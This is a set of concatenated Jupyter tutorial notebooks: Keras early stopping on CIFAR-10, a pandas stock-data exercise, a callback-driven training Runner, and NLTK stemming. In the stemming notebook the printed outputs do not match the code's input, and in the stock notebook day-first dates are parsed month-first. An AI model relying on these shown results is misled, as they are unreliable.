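                print(f"Stopping early at epoch {epoch}: no improvement in {patience} epochs")
                break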
###Code
from keras.datasets import cifar10
from keras.models import Sequential, load_model
from keras.layers import Dense, BatchNormalization, Activation
from keras.layers import Conv2D, MaxPooling2D, Flatten
from keras.utils import to_categorical
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras.optimizers import Nadam
import matplotlib.pyplot as plt
###Output
_____no_output_____
###Markdown
As usual, the hyperparameters needed for the model are initialized; in this case 100 epochs are specified, but there is no guarantee that all of them will be used.
###Code
batch_size = 32
num_classes = 10
epocas = 100
###Output
_____no_output_____
###Markdown
Data preprocessingAs usual, the data is loaded, the dataset is explored briefly, and the classes are one-hot encoded so that the usual loss function, categorical cross-entropy, can be used.
###Code
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
print("Tamaño de x_train:", x_train.shape)
print(x_train.shape[0], "Ejemplos de entrenamiento")
print(x_test.shape[0], "Ejemplos de prueba")
plt.imshow(x_train[10, :, :, :])
x_train = x_train.astype("float32")
x_test = x_test.astype("float32")
# Always normalize the data
x_train /= 255
x_test /= 255
# One-hot encode each class of the dataset
y_train = to_categorical(y_train, num_classes)
y_test = to_categorical(y_test, num_classes)
###Output
_____no_output_____
###Markdown
CNN architectureIn this case the following architecture is used:- The **first** layer is a convolution with 32 filters, a $3 \times 3$ kernel with 'same' padding, and ReLU activation.- The **second** layer is also a convolution with 32 filters, a $3 \times 3$ kernel without padding, and ReLU activation.- These two layers are followed by a $2 \times 2$ _max pooling_ layer.- The **third** layer is a convolution with 64 filters, a $3 \times 3$ kernel with 'same' padding, and ReLU activation.- The **fourth** layer is also a convolution with 64 filters, a $3 \times 3$ kernel without padding, and ReLU activation.- These two layers are followed by another $2 \times 2$ _max pooling_ layer; this is the end of the feature-extraction stage.- For the classification stage the feature maps are **flattened** and fed into a fully connected layer of 512 units with ReLU activation.- The **output layer** has as many units as there are classes and a softmax activation.Between the layers _batch normalization_ is applied and biases are removed to speed up training.
###Code
# All layers use batch normalization, except the last one
arquitectura_norm = [
    # Input layer, first feature block
Conv2D(32, kernel_size=(3, 3),
padding="same",
input_shape=x_train.shape[1:],
use_bias=False),
BatchNormalization(scale=False),
Activation("relu"),
Conv2D(32, (3, 3), use_bias=False),
BatchNormalization(scale=False),
Activation("relu"),
MaxPooling2D(pool_size=(2, 2)),
    # Second feature block
Conv2D(64, kernel_size=(3, 3),
padding="same",
use_bias=False),
BatchNormalization(scale=False),
Activation("relu"),
Conv2D(64, (3, 3), use_bias=False),
BatchNormalization(scale=False),
Activation("relu"),
MaxPooling2D(pool_size=(2, 2)),
    # Fully connected layer
Flatten(),
Dense(512, use_bias=False),
BatchNormalization(scale=False),
Activation("relu"),
    # Output layer
Dense(num_classes, activation="softmax")
]
# Build the model with this architecture
model_normalizado = Sequential(arquitectura_norm)
###Output
_____no_output_____
###Markdown
Optimizer and trainingThe _Nadam_ optimizer is used with the `keras` [default values](https://keras.io/optimizers/).
###Code
model_normalizado.compile(loss="categorical_crossentropy",
optimizer=Nadam(),
metrics=["accuracy"])
###Output
_____no_output_____
###Markdown
Model callbacksNow _Early stopping_ is implemented as a callback. Fortunately `keras` already ships with an implementation of this technique. In this case the **validation loss** is monitored with a patience of 5, i.e. training stops after 5 consecutive epochs without improvement.In addition, the best model found so far is saved every time the model is evaluated. This is known as a _Model checkpoint_ in `keras`, and it keeps the model with the best monitored value. Here the **validation accuracy** is monitored and only the best model found is saved.
###Code
# Apply early stopping
es = EarlyStopping(monitor="val_loss", mode="min", verbose=1, patience=5)
# Always keep the best model found so far, based on validation accuracy
mc = ModelCheckpoint("mejor_modelo.h5", monitor="val_acc", mode="max", verbose=1, save_best_only=True)
# Train the model
historia = model_normalizado.fit(x_train, y_train,
validation_split=0.2,
epochs=epocas,
verbose=1,
callbacks=[es, mc])
###Output
Train on 40000 samples, validate on 10000 samples
Epoch 1/100
40000/40000 [==============================] - 126s 3ms/step - loss: 1.1688 - acc: 0.5898 - val_loss: 1.1700 - val_acc: 0.6021
Epoch 00001: val_acc improved from -inf to 0.60210, saving model to mejor_modelo.h5
Epoch 2/100
40000/40000 [==============================] - 120s 3ms/step - loss: 0.7645 - acc: 0.7328 - val_loss: 1.0196 - val_acc: 0.6518
Epoch 00002: val_acc improved from 0.60210 to 0.65180, saving model to mejor_modelo.h5
Epoch 3/100
40000/40000 [==============================] - 124s 3ms/step - loss: 0.5962 - acc: 0.7924 - val_loss: 0.7436 - val_acc: 0.7483
Epoch 00003: val_acc improved from 0.65180 to 0.74830, saving model to mejor_modelo.h5
Epoch 4/100
40000/40000 [==============================] - 125s 3ms/step - loss: 0.4569 - acc: 0.8398 - val_loss: 0.8535 - val_acc: 0.7280
Epoch 00004: val_acc did not improve from 0.74830
Epoch 5/100
40000/40000 [==============================] - 126s 3ms/step - loss: 0.3435 - acc: 0.8795 - val_loss: 0.8401 - val_acc: 0.7474
Epoch 00005: val_acc did not improve from 0.74830
Epoch 6/100
40000/40000 [==============================] - 121s 3ms/step - loss: 0.2414 - acc: 0.9166 - val_loss: 0.9202 - val_acc: 0.7379
Epoch 00006: val_acc did not improve from 0.74830
Epoch 7/100
40000/40000 [==============================] - 127s 3ms/step - loss: 0.1821 - acc: 0.9371 - val_loss: 0.9331 - val_acc: 0.7487
Epoch 00007: val_acc improved from 0.74830 to 0.74870, saving model to mejor_modelo.h5
Epoch 8/100
40000/40000 [==============================] - 128s 3ms/step - loss: 0.1359 - acc: 0.9536 - val_loss: 0.9541 - val_acc: 0.7612
Epoch 00008: val_acc improved from 0.74870 to 0.76120, saving model to mejor_modelo.h5
Epoch 00008: early stopping
###Markdown
As can be seen, the model stopped training before reaching 100 epochs. This happens because the validation loss stopped improving. Let us look at this in more detail.The best **validation loss** was 0.7436, reached at epoch 3; in epochs 4 through 8 it never dropped below that value (for example 0.9331 at epoch 7 and 0.9541 at epoch 8). Since the patience was set to 5, after 5 consecutive epochs without improvement _Early stopping_ was triggered and training was halted.With this in mind, the following plot lets us inspect the training visually.
###Code
# Plot the training and validation loss values
plt.figure(figsize=(13, 9))
plt.plot(historia.history['loss'])
plt.plot(historia.history['val_loss'])
plt.legend(['Train', 'Test'], loc='upper left')
plt.show()
###Output
_____no_output_____
###Markdown
There is clearly overfitting and, more importantly, the training loss and the validation loss diverge considerably.This is the purpose of _Early stopping_: when there is no substantial improvement on the validation set, it is better to stop training and tune the hyperparameters needed to improve the model's performance.
###Code
# Load the best model found
mejor_modelo = load_model("mejor_modelo.h5")
###Output
_____no_output_____
###Markdown
This loads the best model found during the training process, which was saved while each epoch was evaluated. The advantage of combining _Early stopping_ with checkpointing is that there is always a saved model available to evaluate on the test set.The next piece of code does exactly that: the saved model is loaded and evaluated on data the model has never seen.
###Code
resultado = mejor_modelo.evaluate(x_test, y_test)
print(f"Pérdida: {resultado[0]}\nPrecisión: {resultado[1]}")
###Output
10000/10000 [==============================] - 10s 960us/step
Pérdida: 0.9576307853221894
Precisión: 0.7606
|
Chapter5_Exercise2_Stock_Trading.ipynb | ###Markdown
Chapter 5 - Exercise 2: Stock trading Given the following 3 .csv files:* **stocks1.csv :** *date*, *symbol*, *open*, *high*, *low*, *close*, *volume* : stock trading information for several companies* **stocks2.csv :** *date*, *symbol*, *open*, *high*, *low*, *close*, *volume* : stock trading information for several other companies* **companies.csv :** *name*, *employees*, *headquarters_city*, *headquarters_state* : headquarters and employee-count information for each company Complete the following tasks and compare your output with the expected results:
###Code
import pandas as pd
import numpy as np
# Question 1a: Read stocks1.csv => load the data into stocks1
stocks1 = pd.read_csv('stock_trading_data/stocks1.csv')
# Display the first 5 rows of stocks1
stocks1.head(5)
###Output
_____no_output_____
###Markdown
Click here to see the result! date symbol open high low close volume 0 01-03-19 AMZN 1655.13 1674.26 1651.00 1671.73 4974877 1 04-03-19 AMZN 1685.00 1709.43 1674.36 1696.17 6167358 2 05-03-19 AMZN 1702.95 1707.80 1689.01 1692.43 3681522 3 06-03-19 AMZN 1695.97 NaN NaN 1668.95 3996001 4 07-03-19 AMZN 1667.37 1669.75 1620.51 1625.95 4957017
###Code
# Display the last 5 rows of stocks1
stocks1.tail(5)
###Output
_____no_output_____
###Markdown
Click here to see the result! date symbol open high low close volume 10 01-03-19 GOOG 1124.90 1142.97 1124.75 1140.99 1450316 11 04-03-19 GOOG 1146.99 1158.28 1130.69 1147.80 1446047 12 05-03-19 GOOG 1150.06 NaN NaN 1162.03 1443174 13 06-03-19 GOOG 1162.49 1167.57 1155.49 1157.86 1099289 14 07-03-19 GOOG 1155.72 1156.76 1134.91 1143.30 1166559
###Code
# Show the data type (dtype) of each column of stocks1
print(stocks1.dtypes)
###Output
date object
symbol object
open float64
high float64
low float64
close float64
volume int64
dtype: object
###Markdown
Click here to see the result! date object, symbol object, open float64, high float64, low float64, close float64, volume int64, dtype: object
###Code
# View the info of stocks1
print(stocks1.info())
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 15 entries, 0 to 14
Data columns (total 7 columns):
date 15 non-null object
symbol 15 non-null object
open 15 non-null float64
high 13 non-null float64
low 13 non-null float64
close 15 non-null float64
volume 15 non-null int64
dtypes: float64(4), int64(1), object(2)
memory usage: 920.0+ bytes
None
###Markdown
Click here to see the result! <class 'pandas.core.frame.DataFrame'> RangeIndex: 15 entries, 0 to 14; Data columns (total 7 columns): date 15 non-null object; symbol 15 non-null object; open 15 non-null float64; high 13 non-null float64; low 13 non-null float64; close 15 non-null float64; volume 15 non-null int64; dtypes: float64(4), int64(1), object(2); memory usage: 968.0+ bytes
###Code
# Question 1b: Read stocks2.csv => load the data into stocks2
stocks2 = pd.read_csv('stock_trading_data/stocks2.csv')
# Display the first 5 rows of stocks2
stocks2.head(5)
###Output
_____no_output_____
###Markdown
Click here to see the result! date symbol open high low close volume 0 01-03-19 FB 162.60 163.132 161.69 162.28 11097770 1 04-03-19 FB 163.90 167.500 163.83 167.37 18894689 2 05-03-19 FB 167.37 171.880 166.55 171.26 28187890 3 06-03-19 FB 172.90 173.570 171.27 172.51 21531723 4 07-03-19 FB 171.50 171.740 167.61 169.13 18306504
###Code
# Display the last 5 rows of stocks2
stocks2.tail(5)
###Output
_____no_output_____
###Markdown
Click here to see the result! date symbol open high low close volume 5 01-03-19 TSLA 306.94 307.1300 291.90 294.79 22911375 6 04-03-19 TSLA 298.12 299.0000 282.78 285.36 17096818 7 05-03-19 TSLA 282.00 284.0000 270.10 276.54 18764740 8 06-03-19 TSLA 276.48 281.5058 274.39 276.24 10335485 9 07-03-19 TSLA 278.84 284.7000 274.25 276.59 9442483
###Code
# Show the data type (dtype) of each column of stocks2
print(stocks2.dtypes)
###Output
date object
symbol object
open float64
high float64
low float64
close float64
volume int64
dtype: object
###Markdown
Click here to see the result! date object, symbol object, open float64, high float64, low float64, close float64, volume int64, dtype: object
###Code
# View the info of stocks2
print(stocks2.info())
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 10 entries, 0 to 9
Data columns (total 7 columns):
date 10 non-null object
symbol 10 non-null object
open 10 non-null float64
high 10 non-null float64
low 10 non-null float64
close 10 non-null float64
volume 10 non-null int64
dtypes: float64(4), int64(1), object(2)
memory usage: 640.0+ bytes
None
###Markdown
Click here to see the result! <class 'pandas.core.frame.DataFrame'> RangeIndex: 10 entries, 0 to 9; Data columns (total 7 columns): date 10 non-null object; symbol 10 non-null object; open 10 non-null float64; high 10 non-null float64; low 10 non-null float64; close 10 non-null float64; volume 10 non-null int64; dtypes: float64(4), int64(1), object(2); memory usage: 688.0+ bytes
###Code
# Question 1c: Read companies.csv => load the data into companies
companies = pd.read_csv('stock_trading_data/companies.csv')
# View the companies data
companies
###Output
_____no_output_____
###Markdown
Click here to see the result! name employees headquarters_city headquarters_state 0 AMZN 613300 Seattle WA 1 GOOG 98771 Mountain View CA 2 AAPL 132000 Cupertino CA 3 FB 48268 Menlo Park CA 4 TSLA 48016 Palo Alto CA
###Code
# Show the data type (dtype) of each column of companies
print(companies.dtypes)
###Output
name object
employees int64
headquarters_city object
headquarters_state object
dtype: object
###Markdown
Click here to see the result! name object, employees int64, headquarters_city object, headquarters_state object, dtype: object
###Code
# View the info of companies
print(companies.info())
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 5 entries, 0 to 4
Data columns (total 4 columns):
name 5 non-null object
employees 5 non-null int64
headquarters_city 5 non-null object
headquarters_state 5 non-null object
dtypes: int64(1), object(3)
memory usage: 240.0+ bytes
None
###Markdown
Click here to see the result! <class 'pandas.core.frame.DataFrame'> RangeIndex: 5 entries, 0 to 4; Data columns (total 4 columns): name 5 non-null object; employees 5 non-null int64; headquarters_city 5 non-null object; headquarters_state 5 non-null object; dtypes: int64(1), object(3); memory usage: 288.0+ bytes
###Code
# Question 2: Does stocks1 contain any null values?
stocks1.isnull().any()
###Output
_____no_output_____
###Markdown
Click here to see the result! date False, symbol False, open False, high True, low True, close False, volume False, dtype: bool
###Code
# If so, fill them using the following rule:
# If 'high' is null, replace it with the max of the 'high' column for that ticker symbol
stocks1['high'] = stocks1.groupby('symbol')['high'].transform(lambda s: s.fillna(s.max()))
# If 'low' is null, replace it with the min of the 'low' column for that ticker symbol
stocks1['low'] = stocks1.groupby('symbol')['low'].transform(lambda s: s.fillna(s.min()))
stocks1
###Output
_____no_output_____
###Markdown
Nhấn vào đây để xem kết quả! .dataframe tbody tr th:only-of-type { vertical-align: middle; } .dataframe tbody tr th { vertical-align: top; } .dataframe thead th { text-align: right; } date symbol open high low close volume 0 01-03-19 AMZN 1655.13 1674.26 1651.00 1671.73 4974877 1 04-03-19 AMZN 1685.00 1709.43 1674.36 1696.17 6167358 2 05-03-19 AMZN 1702.95 1707.80 1689.01 1692.43 3681522 3 06-03-19 AMZN 1695.97 1709.43 1620.51 1668.95 3996001 4 07-03-19 AMZN 1667.37 1669.75 1620.51 1625.95 4957017 5 01-03-19 AAPL 174.28 175.15 172.89 174.97 25886167 6 04-03-19 AAPL 175.69 177.75 173.97 175.85 27436203 7 05-03-19 AAPL 175.94 176.00 174.54 175.53 19737419 8 06-03-19 AAPL 174.67 175.49 173.94 174.52 20810384 9 07-03-19 AAPL 173.87 174.44 172.02 172.50 24796374 10 01-03-19 GOOG 1124.90 1142.97 1124.75 1140.99 1450316 11 04-03-19 GOOG 1146.99 1158.28 1130.69 1147.80 1446047 12 05-03-19 GOOG 1150.06 1167.57 1124.75 1162.03 1443174 13 06-03-19 GOOG 1162.49 1167.57 1155.49 1157.86 1099289 14 07-03-19 GOOG 1155.72 1156.76 1134.91 1143.30 1166559
###Code
# Question 3: Create the stocks dataframe by combining stocks1 and stocks2 row-wise
# stocks = pd.merge(stocks1, stocks2, how='inner')
stocks = pd.merge(left=stocks1, right=stocks2, how='outer')
# Display the last 15 rows of stocks
stocks.tail(15)
###Output
_____no_output_____
###Markdown
Nhấn vào đây để xem kết quả! .dataframe tbody tr th:only-of-type { vertical-align: middle; } .dataframe tbody tr th { vertical-align: top; } .dataframe thead th { text-align: right; } date symbol open high low close volume 10 01-03-19 GOOG 1124.90 1142.9700 1124.75 1140.99 1450316 11 04-03-19 GOOG 1146.99 1158.2800 1130.69 1147.80 1446047 12 05-03-19 GOOG 1150.06 1167.5700 1124.75 1162.03 1443174 13 06-03-19 GOOG 1162.49 1167.5700 1155.49 1157.86 1099289 14 07-03-19 GOOG 1155.72 1156.7600 1134.91 1143.30 1166559 15 01-03-19 FB 162.60 163.1320 161.69 162.28 11097770 16 04-03-19 FB 163.90 167.5000 163.83 167.37 18894689 17 05-03-19 FB 167.37 171.8800 166.55 171.26 28187890 18 06-03-19 FB 172.90 173.5700 171.27 172.51 21531723 19 07-03-19 FB 171.50 171.7400 167.61 169.13 18306504 20 01-03-19 TSLA 306.94 307.1300 291.90 294.79 22911375 21 04-03-19 TSLA 298.12 299.0000 282.78 285.36 17096818 22 05-03-19 TSLA 282.00 284.0000 270.10 276.54 18764740 23 06-03-19 TSLA 276.48 281.5058 274.39 276.24 10335485 24 07-03-19 TSLA 278.84 284.7000 274.25 276.59 9442483
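Since the two files have identical columns, stacking them row-wise is more commonly done with `pd.concat`; a small equivalent sketch (the outer merge above happens to give the same rows here because there are no duplicates):
###Code
# Equivalent row-wise concatenation (sketch)
stocks = pd.concat([stocks1, stocks2], ignore_index=True)
stocks.tail(15)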
###Code
# Question 4: Create the stocks_companies dataframe by joining stocks and companies
stock_companies = pd.merge(stocks, companies, left_on='symbol', right_on='name')
# Display the first 5 rows of stocks_companies
stock_companies.head(5)
###Output
_____no_output_____
###Markdown
Nhấn vào đây để xem kết quả! .dataframe tbody tr th:only-of-type { vertical-align: middle; } .dataframe tbody tr th { vertical-align: top; } .dataframe thead th { text-align: right; } date symbol open high low close volume name employees headquarters_city headquarters_state 0 01-03-19 AMZN 1655.13 1674.26 1651.00 1671.73 4974877 AMZN 613300 Seattle WA 1 04-03-19 AMZN 1685.00 1709.43 1674.36 1696.17 6167358 AMZN 613300 Seattle WA 2 05-03-19 AMZN 1702.95 1707.80 1689.01 1692.43 3681522 AMZN 613300 Seattle WA 3 06-03-19 AMZN 1695.97 1709.43 1620.51 1668.95 3996001 AMZN 613300 Seattle WA 4 07-03-19 AMZN 1667.37 1669.75 1620.51 1625.95 4957017 AMZN 613300 Seattle WA
###Code
# Question 5: Show the average prices (open, high, low, close) and the average volume for each company
stock_companies.groupby('symbol').agg(['mean'])
###Output
_____no_output_____
###Markdown
Click here to see the result! open high low close volume symbol AAPL 174.890 175.76600 173.472 174.674 23733309.4 AMZN 1681.284 1694.13400 1651.078 1671.046 4755355.0 FB 167.654 169.56440 166.190 168.510 19603715.2 GOOG 1148.032 1158.63000 1134.118 1150.396 1321077.0 TSLA 288.476 291.26716 278.684 281.904 15710180.2
###Code
# Question 6: Show the mean, maximum, and minimum closing price (close) for each company
stock_companies.groupby('symbol').close.agg(['mean', 'max', 'min'])
###Output
_____no_output_____
###Markdown
Click here to see the result! mean min max symbol AAPL 174.674 172.50 175.85 AMZN 1671.046 1625.95 1696.17 FB 168.510 162.28 172.51 GOOG 1150.396 1140.99 1162.03 TSLA 281.904 276.24 294.79
###Code
# Question 7: Create a parsed_time column in stocks_companies by converting the date to a DateTime format
stock_companies['parsed_time'] = pd.to_datetime(stock_companies['date'])
# Show the data type of the parsed_time column
print(stock_companies.parsed_time.dtype)
# Display the first 5 rows of stocks_companies
stock_companies.head(5)
###Output
datetime64[ns]
###Markdown
Nhấn vào đây để xem kết quả! .dataframe tbody tr th:only-of-type { vertical-align: middle; } .dataframe tbody tr th { vertical-align: top; } .dataframe thead th { text-align: right; } date symbol open high low close volume name employees headquarters_city headquarters_state parsed_time 0 01-03-19 AMZN 1655.13 1674.26 1651.00 1671.73 4974877 AMZN 613300 Seattle WA 2019-01-03 1 04-03-19 AMZN 1685.00 1709.43 1674.36 1696.17 6167358 AMZN 613300 Seattle WA 2019-04-03 2 05-03-19 AMZN 1702.95 1707.80 1689.01 1692.43 3681522 AMZN 613300 Seattle WA 2019-05-03 3 06-03-19 AMZN 1695.97 1709.43 1620.51 1668.95 3996001 AMZN 613300 Seattle WA 2019-06-03 4 07-03-19 AMZN 1667.37 1669.75 1620.51 1625.95 4957017 AMZN 613300 Seattle WA 2019-07-03
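Note that these dates are written day-first (e.g. '01-03-19' is 1 March 2019, since the rows are consecutive trading days of March 2019), while `pd.to_datetime` defaults to month-first, which is why the parsed values above look swapped. A hedged sketch of the explicit alternative:
###Code
# Parse the dates explicitly as day-month-year (sketch; dayfirst=True would also work)
stock_companies['parsed_time'] = pd.to_datetime(stock_companies['date'], format='%d-%m-%y')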
###Code
# Question 8: Add a result column: if 'close' > 'open' then result is 'up', otherwise 'down'
stock_companies['result'] = np.where(stock_companies['close'] > stock_companies['open'], 'up', 'down')
###Output
_____no_output_____ |
06_runner2.ipynb | ###Markdown
Runner v2.0> Exception Control FlowWe're now going to rework our Runner.
###Code
#export
from exp.nb_05 import *
# import torch.nn.functional as F
# import torch.nn as nn
# import torch.optim as optim
###Output
_____no_output_____
###Markdown
Get Data
###Code
x_train,y_train,x_valid,y_valid = get_data()
train_ds,valid_ds = Dataset(x_train, y_train),Dataset(x_valid, y_valid)
nh,bs = 50,512
c = y_train.max().item()+1
loss_func = F.cross_entropy
data = DataBunch(*get_dls(train_ds, valid_ds, bs), c)
###Output
_____no_output_____
###Markdown
Callbacks Previously, our `Callback` parent class was
###Code
#export
class Callback():
_order = 0
def set_runner(self, run): self.run = run
def __getattr__(self, k): return getattr(self.run, k)
@property
def name(self):
name = re.sub(r'Callback$', '', self.__class__.__name__)
return camel2snake(name or "callback")
# new to Runner 2.0
def __call__(self, cb_name):
cb = getattr(self, cb_name, None)
if cb and cb(): return True
return False
###Output
_____no_output_____
###Markdown
We're not altering the code for the `TrainEvalCallback` but now it is inheriting from our modified `Callback` parent
###Code
#export
class TrainEvalCallback(Callback):
def begin_fit(self):
self.run.n_epochs = 0.
self.run.n_iter = 0
def after_batch(self):
if not self.in_train:
return
self.run.n_epochs += 1./self.iters
self.run.n_iter += 1
def begin_epoch(self):
self.run.n_epochs = self.epoch
self.model.train()
self.run.in_train = True
def begin_validate(self):
self.model.eval()
self.run.in_train = False
###Output
_____no_output_____
###Markdown
We will define three types of Exceptions that our new Runner will use to control the training loop:
###Code
#export
class CancelTrainException(Exception): pass
class CancelEpochException(Exception): pass
class CancelBatchException(Exception): pass
###Output
_____no_output_____
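As a small illustration of this control flow (a hypothetical callback, not part of the lesson): raising CancelBatchException abandons the current batch, and the Runner's one_batch below catches it and fires after_cancel_batch. The sketch assumes torch is available via the starred import above, as the Runner's own torch.no_grad usage suggests.
###Code
# Hypothetical example: skip batches whose loss is NaN by cancelling the batch (sketch)
class SkipNaNBatch(Callback):
    def after_loss(self):
        # abandon this batch before backward/step if the loss is not a number
        if torch.isnan(self.loss): raise CancelBatchException()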
###Markdown
Runner We're going to remove all of the `if self('some_method')` and instead just call our callbacks:
###Code
#export
class Runner():
def __init__(self, cbs=None, cb_funcs=None):
cbs = listify(cbs)
for cbf in listify(cb_funcs):
cb = cbf()
setattr(self, cb.name, cb)
cbs.append(cb)
self.stop = False
self.cbs = [TrainEvalCallback()]+cbs
@property
def opt(self): return self.learn.opt
@property
def model(self): return self.learn.model
@property
def loss_func(self):return self.learn.loss_func
@property
def data(self):return self.learn.data
def one_batch(self, xb, yb):
try:
self.xb, self.yb = xb, yb
self('begin_batch')
self.pred = self.model(self.xb)
self('after_pred')
self.loss = self.loss_func(self.pred, self.yb)
self('after_loss')
if not self.in_train: return # exits if in validation mode
self.loss.backward()
self('after_backward')
self.opt.step()
self('after_step')
self.opt.zero_grad()
except CancelBatchException: self('after_cancel_batch')
finally: self('after_batch')
def all_batches(self, dl):
self.iters = len(dl)
try:
for xb, yb in dl: self.one_batch(xb, yb)
        except CancelEpochException: self('after_cancel_epoch')
def fit(self, epochs, learn):
self.epochs = epochs
self.learn = learn
self.loss = tensor(0.)
try:
for cb in self.cbs: cb.set_runner(self) # passes self as the runner object to each callback
self("begin_fit")
for epoch in range(epochs):
self.epoch = epoch
if not self('begin_epoch'): self.all_batches(self.data.train_dl)
with torch.no_grad():
if not self('begin_validate'):self.all_batches(self.data.valid_dl)
self('after_epoch')
        except CancelTrainException: self('after_cancel_train')
finally:
self('after_fit')
self.learn = None
def __call__(self, cb_name):
res = False
for cb in sorted(self.cbs, key=lambda x: x._order):
res = cb(cb_name) or res
return res
###Output
_____no_output_____
###Markdown
Other Callbacks TestCallback We now have the ability to completely kill the training in mid-epoch if we reach a certain condition.This is done by simply raising the `CancelTrainException`
###Code
class TestCallback(Callback):
_order=1
def after_step(self):
print(self.n_iter)
if self.n_iter >= 10: raise CancelTrainException()
learn = create_learner(get_model, loss_func, data)
run = Runner(TestCallback())
run.fit(1, learn)
###Output
0
1
2
3
4
5
6
7
8
9
10
###Markdown
Recorder Adding in recording of the learning rates for multiple param groups, and a new plot function that plots the losses against the learning rates.
###Code
#export
class Recorder(Callback):
def begin_fit(self):
self.losses = []
self.lrs = [[] for _ in self.opt.param_groups]
def after_step(self):
if not self.in_train: return
for pg,lr in zip(self.opt.param_groups, self.lrs): lr.append(pg['lr'])
self.losses.append(self.loss.detach().cpu())
def plot_losses(self, skip_last=0):
        plt.plot(self.losses[:len(self.losses)-skip_last])
def plot_lr(self, pgid=-1):
plt.plot(self.lrs[pgid])
def plot(self, skip_last=0, pgid=-1):
losses = [o.item() for o in self.losses]
lrs = self.lrs[pgid]
n = len(losses)-skip_last
plt.xscale('log')
plt.plot(lrs[:n], losses[:n])
###Output
_____no_output_____
###Markdown
Param Scheduler Again adding functionality to deal with multiple param groups.
###Code
#export
class ParamScheduler(Callback):
_order = 1
def __init__(self, pname, sched_funcs):
self.pname = pname
self.sched_funcs = sched_funcs
def begin_fit(self):
if not isinstance(self.sched_funcs, (list, tuple)):
self.sched_funcs = [self.sched_funcs] * len(self.opt.param_groups)
def set_param(self):
assert len(self.opt.param_groups)==len(self.sched_funcs) # checking that begin_fit was called
for pg, f in zip(self.opt.param_groups, self.sched_funcs):
pg[self.pname]=f(self.n_epochs/self.epochs) # call the schedule function with the current position
def begin_batch(self):
if self.in_train: self.set_param()
###Output
_____no_output_____
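The schedule functions passed to ParamScheduler simply map a training position in [0, 1] to a parameter value (set_param calls them with n_epochs/epochs). A hedged, standalone illustration follows; the course's annealing helpers live in earlier notebooks, so this lambda is only an example:
###Code
from functools import partial

# Hypothetical usage: decay the learning rate linearly from 0.1 to 0.01 over training (sketch)
lin_sched = lambda pos: 0.1 + (0.01 - 0.1) * pos
# run = Runner(cb_funcs=[Recorder, partial(ParamScheduler, 'lr', lin_sched)])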
###Markdown
LR Finder LR Finder is supposed to help determine a suitable value for the learning rate: it sweeps the learning rate exponentially from min_lr to max_lr over at most max_iter iterations and raises CancelTrainException as soon as the loss blows up, so a reasonable choice is usually a bit below the value where the loss starts to diverge.
###Code
#export
class LR_Find(Callback):
_order = 1
def __init__(self, max_iter=100, min_lr = 1e-6, max_lr=10):
self.max_iter = max_iter
self.min_lr = min_lr
self.max_lr = max_lr
self.best_loss = 1e9
def begin_batch(self):
if not self.in_train: return
pos = self.n_iter/self.max_iter
lr = self.min_lr * (self.max_lr/self.min_lr) ** pos
for pg in self.opt.param_groups: pg['lr'] = lr
def after_step(self):
if self.n_iter>=self.max_iter or self.loss>self.best_loss*10:
raise CancelTrainException
if self.loss < self.best_loss: self.best_loss = self.loss
learn = create_learner(get_model, loss_func, data)
###Output
_____no_output_____
###Markdown
AvgStats
###Code
#export
class AvgStatsCallback(Callback):
def __init__(self, metrics):
self.train_stats = AvgStats(metrics, True)
self.valid_stats = AvgStats(metrics, False)
def begin_epoch(self):
self.train_stats.reset()
self.valid_stats.reset()
def after_loss(self):
stats = self.train_stats if self.in_train else self.valid_stats
with torch.no_grad(): stats.accumulate(self.run)
def after_epoch(self):
print(self.train_stats)
print(self.valid_stats)
###Output
_____no_output_____
###Markdown
Test
###Code
run = Runner(cb_funcs=[LR_Find, Recorder])
run.fit(2, learn)
run.recorder.plot(skip_last=10)
run.recorder.plot_lr()
!python notebook2script.py 06_runner2.ipynb
###Output
Converted 06_runner2.ipynb to exp\nb_06.py
|
natural-language-processing/text-preprocessing-level-1/.ipynb_checkpoints/stemming-checkpoint.ipynb | ###Markdown
TEXT PREPROCESSING - STEMMING**Stemming** is a text preprocessing technique where the tokens generated from the corpus are reduced to their base units. The base units need not be meaningful words, which makes stemming simple and fast: it is a manual, rule-based way of cutting words down.* _go, going, gone --> go_**Overstemming** is when you stem too much of the token.* _universe, university, universities --> univers_**Understemming** is when you don't stem the token enough.* _datum, data --> dat_ ==> What about date?**StopWords** are words which do not add much meaning to the sentence.* _a, an, the, is_
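A quick, hedged illustration of over- and understemming with PorterStemmer (exact stems can vary slightly between NLTK versions, so the expectations in the comment are indicative only):
###Code
from nltk.stem import PorterStemmer

demo_stemmer = PorterStemmer()
for word in ["go", "going", "gone", "universe", "university", "universities", "data", "datum", "date"]:
    # e.g. 'universe' and 'university' typically both reduce to 'univers' (overstemming)
    print(word, "->", demo_stemmer.stem(word))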
###Code
#will be using NLTK to demonstrate stemming
import nltk
from nltk.stem import PorterStemmer
from nltk.corpus import stopwords
paragraph = """Paragraphs are the building blocks of papers. Many students define paragraphs \
in terms of length. A paragraph is a group of at least five sentences. Paragraph \
is half a page long, etc."""
#generate sentences from the paragraph
sentences = nltk.sent_tokenize(paragraph)
print(sentences)
#initalise stemmer and process each sentence
stemmer = PorterStemmer()
stem_sentences = []
for i, sentence in enumerate(sentences):
words = nltk.word_tokenize(sentence)
print("Words before stemming : ", words)
stem_words = []
for word in words:
if word not in set(stopwords.words('english')):
stem_word = stemmer.stem(word)
stem_words.append(stem_word)
sentences[i] = ' '.join(stem_words)
print("Words after stemming : ", stem_words)
print(sentences)
###Output
Words before stemming : ['Paragraph', 'is', 'half', 'a', 'page', 'long', ',', 'etc', '.']
Words after stemming : ['paragraph', 'half', 'page', 'long', ',', 'etc', '.']
Words before stemming : ['Paragraph', 'is', 'half', 'a', 'page', 'long', ',', 'etc', '.']
Words after stemming : ['paragraph', 'half', 'page', 'long', ',', 'etc', '.']
Words before stemming : ['Paragraph', 'is', 'half', 'a', 'page', 'long', ',', 'etc', '.']
Words after stemming : ['paragraph', 'half', 'page', 'long', ',', 'etc', '.']
Words before stemming : ['Paragraph', 'is', 'half', 'a', 'page', 'long', ',', 'etc', '.']
Words after stemming : ['paragraph', 'half', 'page', 'long', ',', 'etc', '.']
['paragraph half page long , etc .', 'paragraph half page long , etc .', 'paragraph half page long , etc .', 'paragraph half page long , etc .']
|
04.ComputerVision/segmentation_metrics_playground.ipynb | ###Markdown
